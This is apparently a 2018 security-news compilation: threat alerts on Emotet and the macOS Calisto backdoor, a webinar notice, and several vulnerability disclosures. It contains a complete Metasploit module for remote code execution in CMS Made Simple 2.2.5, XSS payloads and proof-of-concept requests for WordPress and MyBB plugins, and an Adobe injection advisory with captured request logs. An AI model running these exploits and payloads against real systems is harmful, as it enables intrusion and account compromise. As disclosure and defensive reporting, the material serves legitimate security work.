TA18-201A: Emotet Malware

Emotet continues to be among the most costly and destructive malware affecting SLTT governments. Its worm-like features result in rapidly spreading network-wide infection, which are difficult to combat. Emotet infections have cost SLTT governments up to $1 million per incident to remediate.

Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. It uses modular Dynamic Link Libraries (DLLs) to continuously evolve and update its capabilities. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment.

Emotet is disseminated through malspam (emails containing malicious attachments or links) that uses branding familiar to the recipient; it has even been spread using the MS-ISAC name. As of July 2018, the most recent campaigns imitate PayPal receipts, shipping notifications, or “past-due” invoices purportedly from MS-ISAC. Initial infection occurs when a user opens or clicks the malicious download link, PDF, or macro-enabled Microsoft Word document included in the malspam. Once downloaded, Emotet establishes persistence and attempts to propagate the local networks through incorporated spreader modules.

Figure 1: Malicious email distributing Emotet

Currently, Emotet uses five known spreader modules: NetPass.exe, WebBrowserPassView, Mail PassView, Outlook scraper, and a credential enumerator.

  1. NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives.
  2. Outlook scraper is a tool that scrapes names and email addresses from the victim’s Outlook accounts and uses that information to send out additional phishing emails from the compromised accounts.
  3. WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module.
  4. Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail and passes them to the credential enumerator module.
  5. Credential enumerator is a self-extracting RAR file containing two components: a bypass component and a service component. The bypass component is used for the enumeration of network resources and either finds writable share drives using Server Message Block (SMB) or tries to brute force user accounts, including the administrator account. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet’s access to SMB can result in the infection of entire domains (servers and clients).
Figure 2: Emotet infection process

To maintain persistence, Emotet injects code into explorer.exe and other running processes. It can also collect sensitive information, including system name, location, and operating system version, and connects to a remote command and control server (C2), usually through a generated 16-letter domain name that ends in “.eu.” Once Emotet establishes a connection with the C2, it reports a new infection, receives configuration data, downloads and runs files, receives instructions, and uploads data to the C2 server.

Emotet artifacts are typically found in arbitrary paths located off of the AppData\Local and AppData\Roaming directories. The artifacts usually mimic the names of known executables. Persistence is typically maintained through Scheduled Tasks or via registry keys. Additionally, Emotet creates randomly-named files in the system root directories that are run as Windows services. When executed, these services attempt to propagate the malware to adjacent systems via accessible administrative shares.

Note: it is essential that privileged accounts are not used to log in to compromised systems during remediation as this may accelerate the spread of the malware.

Example Filenames and Paths:

C:\Users\<username>\AppData \Local\Microsoft\Windows\shedaudio.exe

C:\Users\<username>\AppData\Roaming\Macromedia\Flash Player\macromedia\bin\flashplayer.exe

Typical Registry Keys:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

System Root Directories:

C:\Windows\11987416.exe

C:\Windows\System32\46615275.exe

C:\Windows\System32\shedaudio.exe

C:\Windows\SysWOW64\f9jwqSbS.exe

Calisto Trojan for macOS

An interesting aspect of studying a particular piece of malware is tracing its evolution and observing how the creators gradually add new monetization or entrenchment techniques. Also of interest are developmental prototypes that have had limited distribution or not even occurred in the wild. We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.

Malware for macOS is not that common, and this sample was found to contain some suspiciously familiar features. So we decided to unpick Calisto to see what it is and why its development was stopped (or was it?).

Propagation

We have no reliable information about how the backdoor was distributed. The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac. Interestingly, Calisto’s authors chose the ninth version of the program as a cover which is still relevant.

For illustrative purposes, let’s compare the malware file with the version of Mac Internet Security X9 downloaded from the official site.

Backdoor Intego Mac Internet Security 2018
Unsigned Signed by Intego

It looks fairly convincing. The user is unlikely to notice the difference, especially if he has not used the app before.

Installation

As soon as it starts, the application presents us with a sham license agreement. The text differs slightly from the Intego’s one — perhaps the cybercriminals took it from an earlier version of the product.

Next, the “antivirus” asks for the user’s login and password, which is completely normal when installing a program able to make changes to the system on macOS.

But after receiving the credentials, the program hangs slightly before reporting that an error has occurred and advising the user to download a new installation package from the official site of the antivirus developer.

The technique is simple, but effective. The official version of the program will likely be installed with no problems, and the error will soon be forgotten. Meanwhile, in the background, Calisto will be calmly getting on with its mission.

Analysis of the Trojan

With SIP enabled

Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OSX El Capitan, SIP is designed to protect critical system files from being modified — even by a user with root permissions. Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take into account the then-new technology. However, many users still disable SIP for various reasons; we categorically advise against doing so.

Calisto’s activity can be investigated using its child processes log and decompiled code:

Log of commands executed by the Trojan during its operation

Hardcoded commands inside the Calisto sample

We can see that the Trojan uses a hidden directory named .calisto to store:

  • Keychain storage data
  • Data extracted from the user login/password window
  • Information about the network connection
  • Data from Google Chrome: history, bookmarks, cookies

Recall that Keychain stores passwords/tokens saved by the user, including ones saved in Safari. The encryption key for the storage is the user’s password.

Next, if SIP is enabled, an error occurs when the Trojan attempts to modify system files. This violates the operational logic of the Trojan, causing it to stop.

Error message

With SIP disabled/not available

Observing Calisto with SIP disabled is far more interesting. To begin with, Calisto executes the steps from the previous chapter, but as the Trojan is not interrupted by SIP, it then:

  • Copies itself to /System/Library/ folder
  • Sets itself to launch automatically on startup
  • Unmounts and uninstalls its DMG image
  • Adds itself to Accessibility
  • Harvests additional information about the system
  • Enables remote access to the system
  • Forwards the harvested data to a C&C server

Let’s take a closer look at the malware’s implementation mechanisms.

Adding itself to startup is a classic technique for macOS, and is done by creating a .plist file in the /Library/LaunchAgents/ folder with a link to the malware:


The DMG image is unmounted and uninstalled via the following command:

To extend its capabilities, Calisto adds itself to Accessibility by directly modifying the TCC.db file, which is bad practice and an indicator of malicious activity for the antivirus. On the other hand, this method does not require user interaction.

An important feature of Calisto is getting remote access to the user system. To provide this, it:

  • Enables remote login
  • Enables screen sharing
  • Configures remote login permissions for the user
  • Allows remote login to all
  • Enables a hidden “root” account in macOS and sets the password specified in the Trojan code

The commands used for this are:

Note that although the user “root” exists in macOS, it is disabled by default. Interestingly, after a reboot, Calisto again requests user data, but this time waits for the input of the actual root password, which it previously changed itself (root: aGNOStIC7890!!!). This is one indication of the Trojan’s rawness.

At the end, Calisto attempts to transfer all data from the .calisto folder to the cybercriminals’ server. But at the time of our research, the server was no longer responding to requests and seemed to be disabled:


Attempt to contact the C&C server

Extra functions

Static analysis of Calisto revealed unfinished and unused additional functionality:

  • Loading/unloading of kernel extensions for handling USB devices
  • Data theft from user directories
  • Self-destruction together with the OS

Loading/unloading of kernel extensions

Working with user directories

Self-destruction together with the entire system

Connections with Backdoor.OSX.Proton

Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:

  • The distribution method is similar: it masquerades as a well-known antivirus (a Backdoor.OSX.Proton was previously distributed under the guise of a Symantec antivirus product)
  • The Trojan sample contains the line “com.proton.calisto.plist”
  • Like Backdoor.OSX.Proton, this Trojan is able to steal a great amount of personal data from the user system, including the contents of Keychain

Recall that all known members of the Proton malware family were distributed and discovered in 2017. The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton.

To protect against Calisto, Proton, and their analogues:

  • Always update to the current version of the OS
  • Never disable SIP
  • Run only signed software downloaded from trusted sources, such as the App Store
  • Use antivirus software

MD5

DMG image: d7ac1b8113c94567be4a26d214964119
Mach-O executable: 2f38b201f6b368d587323a1bec516e5d

CMS Made Simple 2.2.5 Authenticated Remote Command Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘CMS Made Simple Authenticated RCE via File Upload/Copy’,
‘Description’ => %q{
CMS Made Simple v2.2.5 allows an authenticated administrator to upload a file
and rename it to have a .php extension. The file can then be executed by opening
the URL of the file in the /uploads/ directory.
},
‘Author’ =>
[
‘Mustafa Hasen’, # Vulnerability discovery and EDB PoC
‘Jacob Robles’ # Metasploit Module
],
‘License’ => MSF_LICENSE,
‘References’ =>
[
[ ‘CVE’, ‘2018-1000094’ ],
[ ‘CWE’, ‘434’ ],
[ ‘EDB’, ‘44976’ ],
[ ‘URL’, ‘http://dev.cmsmadesimple.org/bug/view/11741’ ]
],
‘Privileged’ => false,
‘Platform’ => [ ‘php’ ],
‘Arch’ => ARCH_PHP,
‘Targets’ =>
[
[ ‘Universal’, {} ],
],
‘DefaultTarget’ => 0,
‘DisclosureDate’ => ‘Jul 03 2018’))

register_options(
[
OptString.new(‘TARGETURI’, [ true, “Base cmsms directory path”, ‘/cmsms/’]),
OptString.new(‘USERNAME’, [ true, “Username to authenticate with”, ”]),
OptString.new(‘PASSWORD’, [ true, “Password to authenticate with”, ”])
])

register_advanced_options ([
OptBool.new(‘ForceExploit’, [false, ‘Override check result’, false])
])
end

def check
res = send_request_cgi({
‘uri’ => normalize_uri(target_uri.path),
‘method’ => ‘GET’
})

unless res
vprint_error ‘Connection failed’
return CheckCode::Unknown
end

unless res.body =~ /CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/
return CheckCode::Unknown
end

version = Gem::Version.new($1)
vprint_status(“#{peer} – CMS Made Simple Version: #{version}”)

if version == Gem::Version.new(‘2.2.5’)
return CheckCode::Appears
end

if version < Gem::Version.new(‘2.2.5’)
return CheckCode::Detected
end

CheckCode::Safe
end

def exploit
unless [CheckCode::Detected, CheckCode::Appears].include?(check)
unless datastore[‘ForceExploit’]
fail_with Failure::NotVulnerable, ‘Target is not vulnerable. Set ForceExploit to override.’
end
print_warning ‘Target does not appear to be vulnerable’
end

res = send_request_cgi({
‘uri’ => normalize_uri(target_uri.path, ‘admin’, ‘login.php’),
‘method’ => ‘POST’,
‘vars_post’ => {
‘username’ => datastore[‘USERNAME’],
‘password’ => datastore[‘PASSWORD’],
‘loginsubmit’ => ‘Submit’
}
})
unless res
fail_with(Failure::NotFound, ‘A response was not received from the remote host’)
end

unless res.code == 302 && res.get_cookies && res.headers[‘Location’] =~ /\/admin\?(.*)?=(.*)/
fail_with(Failure::NoAccess, ‘Authentication was unsuccessful’)
end

vprint_good(“#{peer} – Authentication successful”)
csrf_name = $1
csrf_val = $2

csrf = {csrf_name => csrf_val}
cookies = res.get_cookies
filename = rand_text_alpha(8..12)

# Generate form data
message = Rex::MIME::Message.new
message.add_part(csrf[csrf_name], nil, nil, “form-data; name=\”#{csrf_name}\””)
message.add_part(‘FileManager,m1_,upload,0’, nil, nil, ‘form-data; name=”mact”‘)
message.add_part(‘1’, nil, nil, ‘form-data; name=”disable_buffer”‘)
message.add_part(payload.encoded, nil, nil, “form-data; name=\”m1_files[]\”; filename=\”#{filename}.txt\””)
data = message.to_s

res = send_request_cgi({
‘uri’ => normalize_uri(target_uri.path, ‘admin’, ‘moduleinterface.php’),
‘method’ => ‘POST’,
‘data’ => data,
‘ctype’ => “multipart/form-data; boundary=#{message.bound}”,
‘cookie’ => cookies
})

unless res && res.code == 200
fail_with(Failure::UnexpectedReply, ‘Failed to upload the text file’)
end
vprint_good(“#{peer} – File uploaded #{filename}.txt”)

fileb64 = Rex::Text.encode_base64(“#{filename}.txt”)
data = {
‘mact’ => ‘FileManager,m1_,fileaction,0’,
“m1_fileactioncopy” => “”,
‘m1_selall’ => “a:1:{i:0;s:#{fileb64.length}:\”#{fileb64}\”;}”,
‘m1_destdir’ => ‘/’,
‘m1_destname’ => “#{filename}.php”,
‘m1_path’ => ‘/uploads’,
‘m1_submit’ => ‘Copy’,
csrf_name => csrf_val
}

res = send_request_cgi({
‘uri’ => normalize_uri(target_uri.path, ‘admin’, ‘moduleinterface.php’),
‘method’ => ‘POST’,
‘cookie’ => cookies,
‘vars_post’ => data
})

unless res
fail_with(Failure::NotFound, ‘A response was not received from the remote host’)
end

unless res.code == 302 && res.headers[‘Location’].to_s.include?(‘copysuccess’)
fail_with(Failure::UnexpectedReply, ‘Failed to rename the file’)
end
vprint_good(“#{peer} – File renamed #{filename}.php”)

res = send_request_cgi({
‘uri’ => normalize_uri(target_uri.path, ‘uploads’, “#{filename}.php”),
‘method’ => ‘GET’,
‘cookie’ => cookies
})
end
end

NCCIC Webinar Series on Russian Government Cyber Activity

Original release date: July 19, 2018

NCCIC will conduct a series of webinars on Russian government cyber activity against critical infrastructure (as detailed in NCCIC Alert TA18-074A), which will feature NCCIC subject matter experts discussing recent cybersecurity incidents, mitigation techniques, and resources that are available to help protect critical assets.

The same webinar will be held from 1-2:30 p.m. ET on the dates listed below:

  • Monday, July 23
  • Wednesday, July 25
  • Monday, July 30
  • Wednesday, August 1

NCCIC encourages users and administrators to attend one of the webinar sessions by visiting https://share.dhs.gov/nccicbriefings or dialing 1-888-221-6227. Attendees may access the webinar as a guest on the day of each event; a registered account is not required for attendees to join.


This product is provided subject to this Notification and this Privacy & Use policy.

WordPress All In One Favicon 4.6 Cross Site Scripting

# Exploit Title: WordPress Plugin All In One Favicon <= 4.6 – Authenticated Multiple XSS Persistent
# Date: 2018-07-10
# Exploit Author: Javier Olmedo

# Website: https://hackpuntes.com/
# Vendor Homepage: http://www.techotronic.de/
# Software Link: https://wordpress.org/plugins/all-in-one-favicon/
# Version/s: 4.6 and below
# Patched Version: unpatched
# CVE : 2018-13832
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099

Plugin description:
All In One Favicon adds favicons to your site and your admin pages. You can either use favicons you already uploaded or use the builtin upload mechanism to upload a favicon to your WordPress installation.

Description:
WordPress Plugin All In One Favicon before 4.6 allows remote authenticated users to execute javascript code through XSS Persistent attacks.

Technical details:

The following parameters are vulnerable:
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text

Proof of Concept (PoC):
The following POST request will cause it to display an alert in the browser when it runs as an authenticated user with permissions:

POST /wordpress/wp-admin/admin-post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
Content-Type: multipart/form-data; boundary=—————————168911549614148
Content-Length: 3407
Connection: close
Upgrade-Insecure-Requests: 1

—————————–168911549614148
Content-Disposition: form-data; name=”_wpnonce”

9df031414d
—————————–168911549614148
Content-Disposition: form-data; name=”_wp_http_referer”

/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
—————————–168911549614148
Content-Disposition: form-data; name=”option_page”

aio-favicon_settings
—————————–168911549614148
Content-Disposition: form-data; name=”aio-favicon_settings[frontendICO-text]”

“><img src=a onerror=alert(1)>
—————————–168911549614148
Content-Disposition: form-data; name=”action”

aioFaviconUpdateSettings
—————————–168911549614148
Content-Disposition: form-data; name=”aioFaviconUpdateSettings”

Guardar cambios
—————————–168911549614148

Content-Disposition: form-data; name=”action”

aioFaviconUpdateSettings
—————————–168911549614148
Content-Disposition: form-data; name=”aio-favicon_settings[removeLinkFromMetaBox]”

true
—————————–168911549614148
Content-Disposition: form-data; name=”action”

aioFaviconUpdateSettings
—————————–168911549614148–

Payloads:
“><img src=a onerror=alert(1)>
“><img src=a onerror=alert(String.fromCharCode(88,83,83))>

Timeline:
15/03/2018 I send the report. (no answer)
27/05/2018 I send the report, again. (no answer)
10/07/2018 Public disclosure.

References:
https://hackpuntes.com/cve-2018-13832-wordpress-plugin-all-in-one-favicon-4-6-autenticado-multiples-cross-site-scripting-persistentes/

MyBB New Threads 1.1 Cross Site Scripting

# Exploit Title: MyBB New Threads Plugin - Cross-Site Scripting
# Date: 7/16/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1143
# Version: 1.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-14392

1. Description:
New Threads is a plugin that displays new threads on the index page. The thread titles allow XSS.

2. Proof of Concept:

- Create a new thread with the following subject <script>alert('XSS')</script>
- Visit the index page to see alert.

3. Solution:
Update to 1.2

Adobe Systems Main lead DBMS Arbitrary Code Injection

Document Title:
===============
Adobe Systems – Arbitrary Code Injection Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2120

PSIRT ID: 7873

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2018/07/19/hacker-injects-arbitrary-codes-main-lead-database-adobe-systems

Acknowledgements: (Industry Partners)
https://helpx.adobe.com/security/acknowledgements.html

Release Date:
=============
2018-07-19

Vulnerability Laboratory ID (VL-ID):
====================================
2120

Common Vulnerability Scoring System:
====================================
6.4

Vulnerability Class:
====================
Multiple

Current Estimated Price:
========================
5.000a! – 10.000a!

Product & Service Introduction:
===============================
Adobe Systems Incorporated commonly known as Adobe, is an American
multinational computer software company.
The company is headquartered in San Jose, California, United States.
Adobe has historically focused upon the creation of
multimedia and creativity software products, with a more recent foray
towards rich Internet application software
development. It is best known for Photoshop, an image editing software,
Acrobat Reader, the Portable Document Format
(PDF), and Adobe Creative Suite, as well as its successor, Adobe
Creative Cloud.

(COpy of the Homepage: https://en.wikipedia.org/wiki/Adobe_Systems )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered arbitrary
code execution vulnerability in the Adobe Systems main lead database
management system.

Vulnerability Disclosure Timeline:
==================================
2018-02-05: Researcher Notification & Coordination (Security Researcher)
2018-02-08: Vendor Notification (Adobe PSIRT – Security Department)
2018-02-12: Vendor Response/Feedback (Adobe PSIRT – Security Department)
2018-02-16: Reporter Response/Feedback #1 (Security Researcher)
2018-02-27: Reporter Response/Feedback #2 (Security Researcher)
2018-03-04: Reporter Response/Feedback #3 (Security Researcher)
2018-06-14: Vendor Fix/Patch (Adobe Service Developer Team)
2018-06-15: Security Acknowledgements (Adobe PSIRT – Security Department)
2018-06-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Adobe Systems
Product: Main Lead DBMS – *.adobesystems.com 2018 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Pre auth – no privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure Program

Technical Details & Description:
================================
The vulnerability laboratory core research team discovered an arbitrary
code injection vulnerability in the adobe systems main lead database
management system.
The issue allows remote attackers to inject own malicious script codes
and system specific codes with persistent attack vector to the
application-side of
the vulnerable modules context or affected internal services.

The arbitrary code injection vulnerability is located in the external
services associated with the content of adobe systems subdomain services.
Attackers are able to attack the adobe system’s lead database by
inserting arbitrary code over other database layers. This issue allows an
attacker to perform the injection using an external service form. After
the content has been delivered, the data is stored in the sub-service
database management system. Over time, the database contents of the sub
services are backed up and synchronized with the main database of the
adobe systems. In the case of our research, we identified several
external services to attack the sub-services of the adobe system and
finally
deliver the faulty content within the main lead database.

The injection points are the external services. The exeuction points are
located in the backend when processing to manage the contents and
when the content is delivered through the main lead database to other
customers or business clients (commercials, mailing and notify). The
vulnerable domain that executed the contents are adobesystems.com and
info.adobesystems.com. The request method to inject is POST and the
attack vector is located on the application-sideof adobe-systems. To
register and send an email no user account is required.

Successful exploitation of the arbitrary code injection vulnerability
results in malformed dbms injects, dbms compromise, session hijacking,
persistent phishing attacks, persistent external redirects to malicious
source and manipulation of affected or connected application modules.

Vulnerable Micro Service(s):
[+] apps.enterprise.adobe.com
[+] offflivestream.creativecloud.adobeevents.com/
[+] summit-emea.adobe.com

Vulnerable Sub Service(s):
[+] landing.adobe.com
[+] offers.adobe.com
[+]
sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.5.0/s3118621512273

Request Method(s):
[+] POST

Vulnerable File(s):
[+] m.jsp
[+] adobe_econsultancy_digital_trends_2017.html
[+] submit.html
[+] form.html

Parameter(s):
[+] firstname
[+] lastname
[+] companyname

Affected Domain(s):
[+] adobe.com
[+] info.adobesystems.com
[+] t.info.adobesystems.com
[+] m.info.adobesystems.com
[+] t-info.mail.adobe.com

Proof of Concept (PoC):
=======================
The arbitrary code injection vulnerability can be exploited by remote
attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.

1. PoC: Injection Points External
https://apps.enterprise.adobe.com/faas/service/3.0.0/submit
https://offflivestream.creativecloud.adobeevents.com/register/registration/form
https://summit-emea.adobe.com/emea/registration/?sdid=ZFN4FLWT&mv=email

2. PoC: Followed Sub Systems
http://landing.adobe.com/
https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html
https://offers.adobe.com/de/de/marketing/offers/adobe_econsultancy_digital_trends_2017.html
http://t-info.mail.adobe.com/r/?id=t3100ff18,90990a66,90990bea
https://sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.5.0/s3118621512273

3. PoC: Execution Points
https://www.adobe.com/de/modal-offers/how-to-data-to-customer-intelligence.html
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea733a
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D

Note: The following example shows
1. Enterprise to stats adobe
2. After that occurs a sync to the sub domain service
3. Then the data is merged to the info adobe service
4. Some sync and backups later the content is inside the main lead database

— PoC Session Logs (POST Inject)—
Status: 200[OK]
GET
https://apps.enterprise.adobe.com/faas/service/3.0.0/submit?callback=jQuery1102013829541567907688_1518951745795&id=1&l=3&d=%2Fcontent%2Fmicrosites%2Fadobe-offers%2Fde%2Fde%2Fmarketing%2Foffers%2Fadobe_econsultancy_digital_trends_2017.html&Form1%5B14%5D=822&Form1%5B15%5D=829&Form1%5B10%5D=a%22%3E%3C+src%3Devil.source%3E%3C%3E&Form1%5B33%5D=https%3A%2F%2Fwww.test.de%2F%22%3E%3Crc%3Devil.source%3E%3C%3E&Form1%5B95%5D=2746&Form1%5B8%5D=c%22%3E%3Csrc%3Devil.source%3E%3C%3E&Form1%5B9%5D=b%22%3E%3Csrc%3Devil.source%3E%3C%3E&Form1%5B1%5D=tester23%40evolutionsec.com&Form1%5B11%5D=01925723572723&Form1%5B16%5D=31337&Form1%5B18%5D=462&Form1%5B19%5D=2922&Form1%5B20%5D=72&Form1%5B130%5D=&Form1%5B35%5D=0&Form1%5B84%5D=0&Form1%5B84%5D=1&Form1%5B85%5D=0&Form1%5B85%5D=1&Form1%5B87%5D=0&Form1%5B87%5D=1&Form1%5B86%5D=0&Form1%5B77%5D=1&Form1%5B78%5D=1&Form1%5B79%5D=1&Form1%5B80%5D=&Form1%5B89%5D=&Form1%5B6%5D=marketing_web_form&Form1%5B7%5D=whitepaper_form&Form1%5B31%5D=EXPERIENCEMANAGERSOLN&Form1%5B36%5D=70114000002Cc8OAAS&Form1%5B37%5D=7011O000002Oq5lQAC&Form1%5B38%5D=&Form1%5B39%5D=&Form1%5B40%5D=&Form1%5B44%5D=&Form1%5B45%5D=&Form1%5B46%5D=&Form1%5B47%5D=&Form1%5B48%5D=&Form1%5B49%5D=&Form1%5B50%5D=&Form1%5B90%5D=DESBU&Form1%5B102%5D=&Form1%5B104%5D=&Form1%5B109%5D=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&Form1%5B115%5D=&Form1%5B116%5D=&Form1%5B122%5D=&Form1%5B123%5D=&Form1%5B124%5D=&Form1%5B125%5D=&Form1%5B126%5D=&Form1%5B127%5D=&Form1%5B128%5D=&Form1%5B129%5D=&Form1%5B120%5D=&ajax=faas-form-1&_=1518951745799

Mime Type[application/json]
Request Header:
Host[apps.enterprise.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0]
Accept[*/*]

Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38&mv=search&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]

Cookie[AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1406116232%7CMCIDTS%7C17581%7CMCMID%7C70200303268859877472538284957896691642%7CMCAAMLH-1519556547%7C6%7CMCAAMB-1519556547%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1518958946s%7CNONE%7CMCAID%7C2D44AEA10530CAFD-40000305C000F505%7CMCSYNCSOP%7C411-17588%7CvVersion%7C2.5.0;
s_pers=%20gpv%3Doffers.adobe.com%253Ade%253Amarketing%253Alandings%253Adigitale_trends_2017%7C1518953545956%3B%20s_nr%3D1518951745958-New%7C1550487745958%3B%20TID%3D-F4KHZX38-%7C1529319749183%3B%20s_vs%3D1%7C1518953726867%3B;
s_sess=%20s_a_campaign%3DF4KHZX38%3B%20s_ppv%3D%255B%2522offers.adobe.com%252Fde%252Fde%252Fmarketing%252Flandings%252Fdigitale_trends_2017.html%2522%252C100%252C0%252C1118%252C1366%252C564%252C1366%252C768%252C1%252C%2522P%2522%255D%3B%20s_cpc%3D1%3B%20s_cc%3Dtrue%3B%20s_sq%3Dadbadobenonacdcprod%253D%252526c.%252526a.%252526activitymap.%252526page%25253Doffers.adobe.com%2525253Ade%2525253Amarketing%2525253Alandings%2525253Adigitale_trends_2017%252526link%25253Dd2d1d3d2A1d1F2d22j1-Abschicken%252526region%25253Dother%252526pageIDType%25253D1%252526.activitymap%252526.a%252526.c%2526adbadobefaasprod%25252Cadbadobeglobalapp%253D%252526c.%252526a.%252526activitymap.%252526page%25253Doffers.adobe.com%2525253Ade%2525253Ade%2525253Amarketing%2525253Alandings%2525253Adigitale_trends_2017.html%252526link%25253D1%252526region%25253Dfaas-form-1%252526pageIDType%25253D1%252526.activitymap%252526.a%252526.c%3B;
AWSALB=SbTNAUwD4VWBfGie5pg1LBkQ7ycVDw3Fzp27qOKDkJWVXWlsMBWc+ZWO6kN7yUrqggRU8u1gRwmDINdgNj0ugIUmSdwvQN0J9S2u3LeTlwIni2swslD5rm7Jgw+R;
PHPSESSID=ggu22jh4hpu53mpubl7udpmju3;
AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; check=true;
s_vi=[CS]v1|2D44AEA10530CAFD-40000305C000F505[CE];
s_iid=70114000002Cc8OAAS; s_cid=7011O000002Oq5lQAC;
mbox=session#e0102d4d21d34f458792072e649f04fb#1518953608|PC#e0102d4d21d34f458792072e649f04fb.26_15#1582196548;
sfdc_session=-; TID=-F4KHZX38-; Fb-Syc=1; AAMC_adobe_0=REGION%7C6;
s_sq=adbadobefaasprod%252Cadbadobeglobalapp%3D%2526c.%2526a.%2526activitymap.%2526page%253Doffers.adobe.com%25253Ade%25253Ade%25253Amarketing%25253Alandings%25253Adigitale_trends_2017.html%2526link%253DAbschicken%2526region%253Dfaas-form-1%2526pageIDType%253D1%2526.activitymap%2526.a%2526.c]
Connection[keep-alive]
Response Header:
content-type[application/json; charset=UTF-8]
content-length[445]
server[Apache]
expires[Thu, 19 Nov 1981 08:52:00 GMT]
cache-control[no-store, no-cache, must-revalidate, post-check=0,
pre-check=0]
pragma[no-cache]
access-control-allow-origin[*]

set-cookie[AWSALB=A3qFidf0O5y8FJMPYy8yPurGXw6U0pm1vsgi9RZbDaOZjkaQdp9cdZICl9KMU2yldLT8dDmkmf0oheGoizsb/x4D/1If/GfJZbDXNeZi0pkdbeLLupJo4azCKowa;

Expires=Sun, 25 Feb 2018 11:05:26 GMT; Path=/
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=adobe.com; secure
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=offers.adobe.com; secure
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=apps.enterprise.adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=offers.adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=apps.enterprise.adobe.com; secure
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=adobe.com; secure
